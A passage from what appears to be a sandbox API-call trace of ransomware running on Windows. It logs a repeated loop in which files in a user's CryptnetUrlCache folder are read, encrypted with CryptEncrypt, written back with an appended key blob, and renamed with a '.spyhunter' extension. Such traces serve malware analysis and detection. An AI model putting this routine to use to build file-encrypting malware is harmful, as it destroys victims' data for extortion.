HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\B3BB9C1BA2D19E090AE305B2683903A0_6F0A84CE2BA99BD19D42C92610275852") returned 151 [0152.285] StrStrW (lpFirst="B3BB9C1BA2D19E090AE305B2683903A0_6F0A84CE2BA99BD19D42C92610275852", lpSrch=".txt") returned 0x0 [0152.285] GetProcessHeap () returned 0x2c0000 [0152.285] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0152.285] ReadFile (in: hFile=0xb0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57ecb4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x57ecb4*=0x652, lpOverlapped=0x0) returned 1 [0152.287] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xfffff9ae, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0152.287] WriteFile (in: hFile=0xb0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x652, lpNumberOfBytesWritten=0x57ecb4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x57ecb4*=0x652, lpOverlapped=0x0) returned 1 [0152.287] GetProcessHeap () returned 0x2c0000 [0152.287] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0152.287] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0152.287] WriteFile (in: hFile=0xb0, lpBuffer=0x57ecf4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57ecb4, lpOverlapped=0x0 | out: lpBuffer=0x57ecf4*, lpNumberOfBytesWritten=0x57ecb4*=0x4, lpOverlapped=0x0) returned 1 [0152.287] WriteFile (in: hFile=0xb0, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57ecb4, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x57ecb4*=0x30, lpOverlapped=0x0) returned 1 [0152.287] CloseHandle (hObject=0xb0) returned 1 [0152.287] GetProcessHeap () returned 0x2c0000 [0152.288] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0152.288] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\B3BB9C1BA2D19E090AE305B2683903A0_6F0A84CE2BA99BD19D42C92610275852.spyhunter") returned 161 [0152.288] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\B3BB9C1BA2D19E090AE305B2683903A0_6F0A84CE2BA99BD19D42C92610275852" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\b3bb9c1ba2d19e090ae305b2683903a0_6f0a84ce2ba99bd19d42c92610275852"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\B3BB9C1BA2D19E090AE305B2683903A0_6F0A84CE2BA99BD19D42C92610275852.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\b3bb9c1ba2d19e090ae305b2683903a0_6f0a84ce2ba99bd19d42c92610275852.spyhunter")) returned 1 [0152.289] GetProcessHeap () returned 0x2c0000 [0152.289] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0152.289] GetProcessHeap () returned 0x2c0000 [0152.289] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0152.289] GetProcessHeap () returned 0x2c0000 [0152.289] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fe6aa8 | out: hHeap=0x2c0000) returned 1 [0152.289] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57ecf8 | out: pbBuffer=0x57ecf8) returned 1 [0152.289] GetProcessHeap () returned 0x2c0000 [0152.289] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0152.289] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57ecf0*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57ecf0*=0x30) returned 1 [0152.289] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\ACF244F1A10D4DBED0D88EBA0C43A9B5_BA1AB6C2BDFDF57799E8116E4002D001" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\acf244f1a10d4dbed0d88eba0c43a9b5_ba1ab6c2bdfdf57799e8116e4002d001"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0152.290] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\ACF244F1A10D4DBED0D88EBA0C43A9B5_BA1AB6C2BDFDF57799E8116E4002D001") returned 151 [0152.290] StrStrW (lpFirst="ACF244F1A10D4DBED0D88EBA0C43A9B5_BA1AB6C2BDFDF57799E8116E4002D001", lpSrch=".txt") returned 0x0 [0152.290] GetProcessHeap () returned 0x2c0000 [0152.290] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0152.290] ReadFile (in: hFile=0xb0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57ecb4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x57ecb4*=0x5ee, lpOverlapped=0x0) returned 1 [0152.432] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xfffffa12, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0152.432] WriteFile (in: hFile=0xb0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x5ee, lpNumberOfBytesWritten=0x57ecb4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x57ecb4*=0x5ee, lpOverlapped=0x0) returned 1 [0152.432] GetProcessHeap () returned 0x2c0000 [0152.432] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0152.432] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0152.432] WriteFile (in: hFile=0xb0, lpBuffer=0x57ecf4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57ecb4, lpOverlapped=0x0 | out: lpBuffer=0x57ecf4*, lpNumberOfBytesWritten=0x57ecb4*=0x4, lpOverlapped=0x0) returned 1 [0152.432] WriteFile (in: hFile=0xb0, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57ecb4, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x57ecb4*=0x30, lpOverlapped=0x0) returned 1 [0152.433] CloseHandle (hObject=0xb0) returned 1 [0152.433] GetProcessHeap () returned 0x2c0000 [0152.433] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0152.433] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\ACF244F1A10D4DBED0D88EBA0C43A9B5_BA1AB6C2BDFDF57799E8116E4002D001.spyhunter") returned 161 [0152.433] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\ACF244F1A10D4DBED0D88EBA0C43A9B5_BA1AB6C2BDFDF57799E8116E4002D001" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\acf244f1a10d4dbed0d88eba0c43a9b5_ba1ab6c2bdfdf57799e8116e4002d001"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\ACF244F1A10D4DBED0D88EBA0C43A9B5_BA1AB6C2BDFDF57799E8116E4002D001.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\acf244f1a10d4dbed0d88eba0c43a9b5_ba1ab6c2bdfdf57799e8116e4002d001.spyhunter")) returned 1 [0152.434] GetProcessHeap () returned 0x2c0000 [0152.434] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0152.434] GetProcessHeap () returned 0x2c0000 [0152.434] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0152.434] GetProcessHeap () returned 0x2c0000 [0152.434] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fe6930 | out: hHeap=0x2c0000) returned 1 [0152.434] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57ecf0 | out: pbBuffer=0x57ecf0) returned 1 [0152.434] GetProcessHeap () returned 0x2c0000 [0152.434] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0152.434] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57ece8*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57ece8*=0x30) returned 1 [0152.434] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\9BC2FFC5D9591E1BD3545230E9B7CC36_CF30943571F9BEE96C487B2D9F0436E6" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\9bc2ffc5d9591e1bd3545230e9b7cc36_cf30943571f9bee96c487b2d9f0436e6"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0152.435] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\9BC2FFC5D9591E1BD3545230E9B7CC36_CF30943571F9BEE96C487B2D9F0436E6") returned 151 [0152.435] StrStrW (lpFirst="9BC2FFC5D9591E1BD3545230E9B7CC36_CF30943571F9BEE96C487B2D9F0436E6", lpSrch=".txt") returned 0x0 [0152.435] GetProcessHeap () returned 0x2c0000 [0152.435] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0152.435] ReadFile (in: hFile=0xb0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57ecac, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x57ecac*=0x5ab, lpOverlapped=0x0) returned 1 [0152.577] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xfffffa55, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0152.577] WriteFile (in: hFile=0xb0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x5ab, lpNumberOfBytesWritten=0x57ecac, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x57ecac*=0x5ab, lpOverlapped=0x0) returned 1 [0152.577] GetProcessHeap () returned 0x2c0000 [0152.577] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0152.577] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0152.577] WriteFile (in: hFile=0xb0, lpBuffer=0x57ecec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57ecac, lpOverlapped=0x0 | out: lpBuffer=0x57ecec*, lpNumberOfBytesWritten=0x57ecac*=0x4, lpOverlapped=0x0) returned 1 [0152.577] WriteFile (in: hFile=0xb0, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57ecac, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x57ecac*=0x30, lpOverlapped=0x0) returned 1 [0152.577] CloseHandle (hObject=0xb0) returned 1 [0152.578] GetProcessHeap () returned 0x2c0000 [0152.578] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0152.578] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\9BC2FFC5D9591E1BD3545230E9B7CC36_CF30943571F9BEE96C487B2D9F0436E6.spyhunter") returned 161 [0152.578] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\9BC2FFC5D9591E1BD3545230E9B7CC36_CF30943571F9BEE96C487B2D9F0436E6" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\9bc2ffc5d9591e1bd3545230e9b7cc36_cf30943571f9bee96c487b2d9f0436e6"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\9BC2FFC5D9591E1BD3545230E9B7CC36_CF30943571F9BEE96C487B2D9F0436E6.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\9bc2ffc5d9591e1bd3545230e9b7cc36_cf30943571f9bee96c487b2d9f0436e6.spyhunter")) returned 1 [0152.579] GetProcessHeap () returned 0x2c0000 [0152.579] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0152.579] GetProcessHeap () returned 0x2c0000 [0152.579] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0152.579] GetProcessHeap () returned 0x2c0000 [0152.579] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fe6350 | out: hHeap=0x2c0000) returned 1 [0152.579] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57ecf0 | out: pbBuffer=0x57ecf0) returned 1 [0152.579] GetProcessHeap () returned 0x2c0000 [0152.579] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0152.579] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57ece8*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57ece8*=0x30) returned 1 [0152.579] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\955CAB6FF6A24D5820D50B5BA1CF79C7_AD9E7615297A3A83320AACE5801A04F9" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\955cab6ff6a24d5820d50b5ba1cf79c7_ad9e7615297a3a83320aace5801a04f9"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0152.580] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\955CAB6FF6A24D5820D50B5BA1CF79C7_AD9E7615297A3A83320AACE5801A04F9") returned 151 [0152.580] StrStrW (lpFirst="955CAB6FF6A24D5820D50B5BA1CF79C7_AD9E7615297A3A83320AACE5801A04F9", lpSrch=".txt") returned 0x0 [0152.580] GetProcessHeap () returned 0x2c0000 [0152.580] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0152.580] ReadFile (in: hFile=0xb0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57ecac, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x57ecac*=0x5e0, lpOverlapped=0x0) returned 1 [0152.698] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xfffffa20, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0152.698] WriteFile (in: hFile=0xb0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x5e0, lpNumberOfBytesWritten=0x57ecac, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x57ecac*=0x5e0, lpOverlapped=0x0) returned 1 [0152.698] GetProcessHeap () returned 0x2c0000 [0152.698] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0152.698] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0152.699] WriteFile (in: hFile=0xb0, lpBuffer=0x57ecec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57ecac, lpOverlapped=0x0 | out: lpBuffer=0x57ecec*, lpNumberOfBytesWritten=0x57ecac*=0x4, lpOverlapped=0x0) returned 1 [0152.699] WriteFile (in: hFile=0xb0, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57ecac, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x57ecac*=0x30, lpOverlapped=0x0) returned 1 [0152.699] CloseHandle (hObject=0xb0) returned 1 [0152.717] GetProcessHeap () returned 0x2c0000 [0152.717] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0152.717] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\955CAB6FF6A24D5820D50B5BA1CF79C7_AD9E7615297A3A83320AACE5801A04F9.spyhunter") returned 161 [0152.717] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\955CAB6FF6A24D5820D50B5BA1CF79C7_AD9E7615297A3A83320AACE5801A04F9" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\955cab6ff6a24d5820d50b5ba1cf79c7_ad9e7615297a3a83320aace5801a04f9"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\955CAB6FF6A24D5820D50B5BA1CF79C7_AD9E7615297A3A83320AACE5801A04F9.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\955cab6ff6a24d5820d50b5ba1cf79c7_ad9e7615297a3a83320aace5801a04f9.spyhunter")) returned 1 [0152.725] GetProcessHeap () returned 0x2c0000 [0152.725] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0152.725] GetProcessHeap () returned 0x2c0000 [0152.725] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0152.725] GetProcessHeap () returned 0x2c0000 [0152.725] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fe61d8 | out: hHeap=0x2c0000) returned 1 [0152.725] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57ece8 | out: pbBuffer=0x57ece8) returned 1 [0152.725] GetProcessHeap () returned 0x2c0000 [0152.725] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0152.725] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57ece0*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57ece0*=0x30) returned 1 [0152.725] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7B8944BA8AD0EFDF0E01A43EF62BECD0_B2DB1CC4B5F2D2A802D56AAED525802D" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\7b8944ba8ad0efdf0e01a43ef62becd0_b2db1cc4b5f2d2a802d56aaed525802d"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0152.726] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7B8944BA8AD0EFDF0E01A43EF62BECD0_B2DB1CC4B5F2D2A802D56AAED525802D") returned 151 [0152.726] StrStrW (lpFirst="7B8944BA8AD0EFDF0E01A43EF62BECD0_B2DB1CC4B5F2D2A802D56AAED525802D", lpSrch=".txt") returned 0x0 [0152.726] GetProcessHeap () returned 0x2c0000 [0152.726] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0152.726] ReadFile (in: hFile=0xb0, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57eca4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x57eca4*=0x67c, lpOverlapped=0x0) returned 1 [0152.856] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xfffff984, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0152.856] WriteFile (in: hFile=0xb0, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x67c, lpNumberOfBytesWritten=0x57eca4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x57eca4*=0x67c, lpOverlapped=0x0) returned 1 [0152.856] GetProcessHeap () returned 0x2c0000 [0152.856] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0152.856] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0152.856] WriteFile (in: hFile=0xb0, lpBuffer=0x57ece4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57eca4, lpOverlapped=0x0 | out: lpBuffer=0x57ece4*, lpNumberOfBytesWritten=0x57eca4*=0x4, lpOverlapped=0x0) returned 1 [0152.856] WriteFile (in: hFile=0xb0, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57eca4, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x57eca4*=0x30, lpOverlapped=0x0) returned 1 [0152.857] CloseHandle (hObject=0xb0) returned 1 [0152.857] GetProcessHeap () returned 0x2c0000 [0152.857] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0152.857] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7B8944BA8AD0EFDF0E01A43EF62BECD0_B2DB1CC4B5F2D2A802D56AAED525802D.spyhunter") returned 161 [0152.857] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7B8944BA8AD0EFDF0E01A43EF62BECD0_B2DB1CC4B5F2D2A802D56AAED525802D" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\7b8944ba8ad0efdf0e01a43ef62becd0_b2db1cc4b5f2d2a802d56aaed525802d"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7B8944BA8AD0EFDF0E01A43EF62BECD0_B2DB1CC4B5F2D2A802D56AAED525802D.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\7b8944ba8ad0efdf0e01a43ef62becd0_b2db1cc4b5f2d2a802d56aaed525802d.spyhunter")) returned 1 [0152.857] GetProcessHeap () returned 0x2c0000 [0152.857] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0152.858] GetProcessHeap () returned 0x2c0000 [0152.858] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0152.858] GetProcessHeap () returned 0x2c0000 [0152.858] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fe0978 | out: hHeap=0x2c0000) returned 1 [0152.858] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57ece8 | out: pbBuffer=0x57ece8) returned 1 [0152.858] GetProcessHeap () returned 0x2c0000 [0152.858] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0152.858] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x57ece0*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x57ece0*=0x30) returned 1 [0152.858] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\5080DC7A65DB6A5960ECD874088F3328_2908F682DFC81A793BD240CF29711C77" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\5080dc7a65db6a5960ecd874088f3328_2908f682dfc81a793bd240cf29711c77"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0152.858] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\5080DC7A65DB6A5960ECD874088F3328_2908F682DFC81A793BD240CF29711C77") returned 151 [0152.859] StrStrW (lpFirst="5080DC7A65DB6A5960ECD874088F3328_2908F682DFC81A793BD240CF29711C77", lpSrch=".txt") returned 0x0 [0152.859] GetProcessHeap () returned 0x2c0000 [0152.859] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0152.859] ReadFile (in: hFile=0xb0, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57eca4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x57eca4*=0x2d7, lpOverlapped=0x0) returned 1 [0152.910] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xfffffd29, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: 